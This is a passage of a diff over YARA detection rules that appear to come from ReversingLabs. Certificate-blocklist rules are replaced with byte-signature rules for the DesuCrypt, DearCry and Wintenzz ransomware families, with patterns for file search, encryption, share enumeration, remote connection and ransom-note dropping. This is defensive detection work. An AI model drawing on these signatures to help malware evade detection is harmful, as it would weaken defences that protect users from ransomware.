?? ?? ?? ?? C7 + 44 24 ?? ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 C1 48 + 8B 05 ?? ?? ?? ?? FF D0 48 89 85 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? + ?? 48 8D 85 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB + ?? 8B 8D ?? ?? ?? ?? 4C 8D 85 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? + 48 C7 44 24 ?? ?? ?? ?? ?? 4D 89 C1 41 89 C8 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 B8 + ?? ?? ?? ?? 44 8D 40 ?? 48 8D 8D ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? + ?? 49 89 C9 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 85 C0 74 ?? 8B 85 ?? ?? ?? ?? 85 C0 + } + $remote_connection_p2 = { + 74 ?? B8 ?? ?? ?? ?? EB ?? B8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? + ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 8D 55 ?? 48 8D 85 ?? ?? ?? ?? 49 89 D0 48 + 8D 15 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 8D 85 ?? ?? ?? ?? 48 89 C1 + 48 8B 05 ?? ?? ?? ?? FF D0 B9 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 48 8D 45 ?? 48 + 89 C1 E8 ?? ?? ?? ?? 84 C0 74 ?? C6 85 ?? ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C1 + 48 8B 05 ?? ?? ?? ?? FF D0 48 8B 85 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 + 48 8B 85 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 B9 ?? ?? ?? ?? 48 8B 05 ?? + ?? ?? ?? FF D0 0F B6 85 ?? ?? ?? ?? 83 F0 ?? 84 C0 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 89 C1 BA ?? ?? ?? ?? 89 C8 F7 EA C1 FA ?? 89 C8 C1 F8 ?? 29 C2 89 D0 69 C0 ?? ?? ?? + ?? 29 C1 89 C8 8D 88 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 45 ?? 41 89 C9 49 89 D0 + 48 8D 15 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 8D 45 ?? 48 C7 44 24 ?? + ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 49 89 C0 48 8B 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 85 C0 0F 94 C0 84 C0 74 ?? 48 8D 55 ?? 48 8D 85 ?? ?? ?? ?? 49 89 D0 48 8D 15 + ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 8D 85 ?? ?? ?? ?? 48 89 C1 48 8B + 05 ?? ?? ?? ?? FF D0 B9 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 48 8D 45 ?? 48 89 C1 + E8 ?? ?? ?? ?? 90 48 81 C4 ?? ?? ?? ?? 5D C3 + } + $find_files = { + 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 83 F8 ?? 0F 95 C0 84 C0 74 ?? BB ?? + ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 8D 95 ?? ?? ?? + ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C2 48 8B 0D ?? ?? ?? + ?? E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? + 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? + ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 + ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 + 8D 95 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B 10 48 83 EA ?? 48 8B 12 + 48 01 D0 48 89 C1 E8 ?? ?? ?? ?? 48 85 C0 0F 95 C0 84 C0 0F 85 ?? ?? ?? ?? 48 8B 8D + ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 8D 85 ?? ?? ?? + ?? 48 89 C1 E8 ?? ?? ?? ?? 83 FB ?? 74 ?? BB ?? ?? ?? ?? EB ?? 90 BB ?? ?? ?? ?? 48 + 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 83 FB ?? 74 ?? BB ?? ?? ?? ?? EB ?? 90 BB + ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 83 FB ?? 74 ?? E9 ?? ?? ?? ?? 90 E9 + ?? ?? ?? ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 + 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ?? ?? ?? + ?? 48 89 C1 E8 ?? ?? ?? ?? E9 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ICE ACTIVATION LIMITED" and pe.signatures[i].serial=="72:89:b0:f9:bd:64:1e:3e:35:2d:c3:18:3f:8d:e6:be" and 1557933274<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($find_files) and ( all of ($encrypt_files_p*)) and ( all of ($remote_connection_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_Fd7B7A8678A67181A54Bc7499Eba44Da : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Desucrypt : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects DesuCrypt ransomware." author = "ReversingLabs" - id = "d6456cb6-e950-54be-a7f4-5c1d622c6aab" - date = "2023-11-08" - modified = "2023-11-08" + id = "b9b3ce2b-f184-5bfa-8e1c-a7b996ac708a" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3100-L3118" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f1e26ea26890043be2c8b9c35ba2e6758b60fe173f00bf4c77cc5289ce0d5600" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.DesuCrypt.yara#L1-L93" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "bd3ba8ea0fc16aad859a73628d0eda180d49298162fe239acf81c7c4e371eaad" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "DesuCrypt" + tc_detection_factor = 5 importance = 25 + strings: + $find_files = { + 8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 57 8B 7D ?? 2B CA 8B C7 41 + F7 D0 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 53 56 8D 5F ?? 03 D9 6A ?? 53 E8 ?? ?? ?? + ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? FF + 75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 5D ?? 8B + CB E8 ?? ?? ?? ?? 33 FF 89 45 ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 8B 75 ?? 59 EB ?? 8B + 43 ?? 89 30 8B F7 83 43 ?? ?? 57 E8 ?? ?? ?? ?? 59 8B C6 5E 5B 5F 8B E5 5D C3 33 FF + 57 57 57 57 57 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 + C5 89 45 ?? 8B 4D ?? 53 8B 5D ?? 57 8B 7D ?? 89 9D ?? ?? ?? ?? EB ?? 8A 01 3C ?? 74 + ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8A 11 80 FA + ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 53 33 DB 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 33 DB + 80 FA ?? 74 ?? 80 FA ?? 74 ?? 8A C3 80 FA ?? 75 ?? B0 ?? 0F B6 C0 2B CF 41 F7 D8 56 + 1B C0 23 C1 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? + 83 C4 ?? 8D 85 ?? ?? ?? ?? 53 53 53 50 53 57 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ?? ?? ?? + ?? 83 FE ?? 75 ?? 50 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 83 FE ?? 74 ?? 56 FF 15 + ?? ?? ?? ?? 8B C3 5E 8B 4D ?? 5F 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ?? 2B 08 + C1 F9 ?? 89 8D ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9 74 ?? + 80 F9 ?? 75 ?? 38 9D ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50 + E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 + 8B 85 ?? ?? ?? ?? 75 ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B C8 0F 84 + ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? E9 + } + $encrypt_files = { + 55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? + ?? ?? 53 56 57 8B D9 89 54 24 ?? B9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? BE ?? ?? ?? + ?? C7 44 24 ?? ?? ?? ?? ?? 8D 7C 24 ?? C7 44 24 ?? ?? ?? ?? ?? F3 A5 6A ?? 6A ?? 8D + 44 24 ?? 50 8D 84 24 ?? ?? ?? ?? 66 A5 50 6A ?? 6A ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? + ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 50 + E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B + E5 5D C3 8D 44 24 ?? 50 8D 44 24 ?? 50 6A ?? 68 ?? ?? ?? ?? FF 74 24 ?? 8D 84 24 ?? + ?? ?? ?? 50 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? + ?? ?? EB ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? + ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 5F + 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3 8D 44 24 ?? 50 FF 74 24 + ?? 6A ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? + ?? E9 ?? ?? ?? ?? 8B 43 ?? 8B 3D ?? ?? ?? ?? 50 89 44 24 ?? 89 44 24 ?? 8D 44 24 ?? + 50 6A ?? 6A ?? 6A ?? 6A ?? FF 74 24 ?? FF D7 85 C0 75 ?? FF 15 ?? ?? ?? ?? 50 51 BA + ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B C8 E8 ?? ?? ?? ?? 50 E8 ?? ?? + ?? ?? 83 C4 ?? 33 C0 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3 + FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 FF 74 24 ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 C4 + ?? 83 7B ?? ?? 72 ?? 8B 1B FF 74 24 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? FF + 74 24 ?? 50 56 6A ?? 6A ?? 6A ?? FF 74 24 ?? FF D7 85 C0 0F 84 ?? ?? ?? ?? 8B 4C 24 + ?? 8B 44 24 ?? 5F 89 01 8B C6 8B 8C 24 ?? ?? ?? ?? 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5 + 5D C3 + } + $enum_shares = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 + 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B F1 89 75 ?? 8B 45 ?? 8D 4D ?? 51 50 + 6A ?? 6A ?? 6A ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 + 0F 85 ?? ?? ?? ?? FF 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F8 89 7D ?? 85 FF 0F 84 ?? ?? + ?? ?? 8D 45 ?? 50 57 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? + 0F 1F 40 ?? 33 DB 39 5D ?? 0F 8E ?? ?? ?? ?? 83 C7 ?? 66 90 F7 47 ?? ?? ?? ?? ?? 74 + ?? 8D 47 ?? 89 45 ?? 8B 06 8B 48 ?? 85 C9 0F 84 ?? ?? ?? ?? 8B 01 8D 55 ?? 52 FF 50 + ?? E9 ?? ?? ?? ?? 8B 17 33 C0 66 89 45 ?? 8B C2 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? + ?? ?? 8D 70 ?? 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C6 D1 F8 83 F8 ?? 77 ?? 8D 34 00 + 89 45 ?? 56 52 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 44 35 ?? EB ?? 52 C6 + 45 ?? ?? 8D 4D ?? FF 75 ?? 50 E8 ?? ?? ?? ?? 8B 75 ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? + 50 8B 4E ?? E8 ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 43 83 C7 ?? + 3B 5D ?? 0F 8C ?? ?? ?? ?? 8B 7D ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 57 8D 45 ?? C7 + 45 ?? ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 57 FF 15 ?? + ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D + ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "IMRAN IT SERVICES LTD" and (pe.signatures[i].serial=="00:fd:7b:7a:86:78:a6:71:81:a5:4b:c7:49:9e:ba:44:da" or pe.signatures[i].serial=="fd:7b:7a:86:78:a6:71:81:a5:4b:c7:49:9e:ba:44:da") and 1548028800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($find_files and $encrypt_files and $enum_shares) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_Ebbdd6Cdeda40Ca64513280Ecd625C54 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Dearcry : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects DearCry ransomware." author = "ReversingLabs" - id = "2cf769dc-5108-5f18-a51e-e152180a2b66" - date = "2023-11-08" - modified = "2023-11-08" + id = "6e2097e0-6495-5185-bbbc-e8168fa0ca7f" + date = "2021-03-12" + modified = "2021-03-12" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3120-L3138" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "1d419f2fe2a9bf744bdde48adc50e0bc48746f1576f96570385a2a1c9ba92d21" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.DearCry.yara#L1-L96" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "40dde232255018e1bc0aadf2378a7a86a99327d13dda58d8ffc5bb38e164de26" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "DearCry" + tc_detection_factor = 5 importance = 25 + strings: + $drop_ransom_note_p1 = { + 55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? A1 ?? + ?? ?? ?? 53 56 57 33 DB 68 ?? ?? ?? ?? 50 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 89 1D ?? ?? + ?? ?? 89 1D ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 89 1D ?? ?? ?? ?? FF 15 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 89 44 24 ?? E8 + ?? ?? ?? ?? 8B F0 6A ?? 68 ?? ?? ?? ?? 89 74 24 ?? E8 ?? ?? ?? ?? 8B F8 89 7C 24 ?? + E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 83 C4 ?? 3B F3 0F 84 ?? ?? ?? ?? 3B FB 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? + 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 5C 24 ?? B8 ?? ?? ?? ?? 33 F6 8B FF + 38 18 74 ?? 50 E8 ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 83 C4 ?? 8B D7 8A 08 88 0A 40 42 84 + C9 75 ?? 8B C7 33 F6 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 74 ?? 0F BE 14 37 52 E8 ?? + ?? ?? ?? 88 04 37 8B C7 83 C4 ?? 46 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 3B F0 72 ?? + 8B 74 24 ?? 46 89 74 24 ?? 69 F6 ?? ?? ?? ?? 8D 86 ?? ?? ?? ?? 3B C3 75 ?? 6A ?? 68 + } + $drop_ransom_note_p2 = { + 89 5C 24 ?? E8 ?? ?? ?? ?? 53 8B F0 53 8D 44 24 ?? 50 56 E8 ?? ?? ?? ?? 56 89 44 24 + ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 8B F8 3B C3 0F 84 ?? ?? ?? ?? FF 15 ?? ?? ?? + ?? 85 C0 0F 86 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4C 24 ?? 53 51 88 5C 24 ?? E8 ?? ?? ?? + ?? 83 C4 ?? 8D 54 24 ?? 52 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? + 8A 44 1C ?? 3C ?? 7C ?? 3C ?? 7E ?? 3C ?? 0F 8C ?? ?? ?? ?? 3C ?? 0F 8F ?? ?? ?? ?? + 0F BE C0 50 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 83 C4 ?? + 8D 54 24 ?? 52 FF D6 83 F8 ?? 0F 84 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 74 ?? 8B + 4C 24 ?? 8B 54 24 ?? 8B 44 24 ?? 51 52 50 6A ?? 8D 4C 24 ?? 51 57 E8 ?? ?? ?? ?? 0F + BE 54 1C ?? 68 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? + ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 74 ?? B8 ?? ?? ?? ?? 8D 50 + ?? 8D 49 ?? 8A 08 40 84 C9 75 ?? 56 2B C2 50 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 + E8 ?? ?? ?? ?? 83 C4 ?? 43 81 FB ?? ?? ?? ?? 0F 8C ?? ?? ?? ?? 33 DB 57 + } + $find_files_p1 = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? B8 ?? ?? + ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 31 45 ?? 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 + A3 ?? ?? ?? ?? 89 65 ?? 8B 45 ?? 89 85 ?? ?? ?? ?? 8B 75 ?? 89 B5 ?? ?? ?? ?? 8B 4D + ?? 89 8D ?? ?? ?? ?? 8B 55 ?? 89 95 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 68 ?? + ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C6 85 ?? ?? ?? ?? ?? 68 + ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? C6 85 ?? ?? ?? ?? ?? + 8B C6 8D 50 ?? 8D 49 ?? 8A 08 40 84 C9 75 ?? 2B C2 80 7C 06 ?? ?? 74 ?? 8B C6 8D 50 + ?? 8A 08 40 84 C9 75 ?? 2B C2 80 7C 06 ?? ?? 74 ?? 68 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? + 8D 95 ?? ?? ?? ?? 52 EB ?? 68 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 + ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 89 + 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 6A + ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? 8B C6 + 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 8B D0 8D 85 ?? ?? ?? ?? 8D 78 ?? 8A 08 40 84 C9 + 75 ?? 2B C7 03 C2 3D ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? 6A ?? 6A ?? 8D 4D ?? 51 E8 ?? ?? + ?? ?? 83 C4 ?? 8B C3 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 83 F8 ?? 76 ?? B8 ?? ?? ?? + ?? EB ?? 8B C3 8D 50 ?? 8D 64 24 ?? 8A 08 40 84 C9 75 ?? 2B C2 50 53 8D 55 ?? 52 E8 + } + $find_files_p2 = { + 83 C4 ?? 33 FF 8D 45 ?? 8D 50 ?? 90 8A 08 40 84 C9 75 ?? 2B C2 74 ?? EB ?? 8D 49 ?? + 0F BE 44 3D ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 88 44 3D ?? 47 8D 45 ?? 8D 50 ?? 8D A4 24 + ?? ?? ?? ?? 8A 08 40 84 C9 75 ?? 2B C2 3B F8 72 ?? 8D 4D ?? 51 68 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8A 10 3A + 11 75 ?? 84 D2 74 ?? 8A 50 ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ?? 33 C0 EB + ?? 1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8D 95 ?? ?? ?? ?? 52 + E8 ?? ?? ?? ?? 83 C4 ?? 8B C6 8D 50 ?? 8D A4 24 ?? ?? ?? ?? 8A 08 40 84 C9 75 ?? 2B + C2 80 7C 30 ?? ?? 74 ?? 8B C6 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 80 7C 30 ?? ?? 74 + ?? 8D 85 ?? ?? ?? ?? 50 56 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 EB ?? 8D 95 ?? ?? ?? + ?? 52 56 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? + ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 50 E8 + ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 8B BD ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 + ?? 68 ?? ?? ?? ?? 6A ?? 8B 9D ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 53 57 8B 55 ?? + 52 8D BD ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? + E9 ?? ?? ?? ?? B8 ?? ?? ?? ?? C3 8B 65 ?? C7 45 ?? ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? E9 + ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B C6 8D 50 ?? 8B FF + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "IT PUT LIMITED" and (pe.signatures[i].serial=="00:eb:bd:d6:cd:ed:a4:0c:a6:45:13:28:0e:cd:62:5c:54" or pe.signatures[i].serial=="eb:bd:d6:cd:ed:a4:0c:a6:45:13:28:0e:cd:62:5c:54") and 1549238400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($drop_ransom_note_p*)) and ( all of ($find_files_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_61Da676C1Dcfcf188276E2C70D68082E : INFO FILE +rule REVERSINGLABS_Win64_Ransomware_Wintenzz : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Wintenzz ransomware." author = "ReversingLabs" - id = "d974b740-38fa-564d-b4c6-8955568a4e77" - date = "2023-11-08" - modified = "2023-11-08" + id = "6bf569e8-b050-51ef-a948-0eb294248d63" + date = "2021-11-02" + modified = "2021-11-02" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3140-L3156" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - 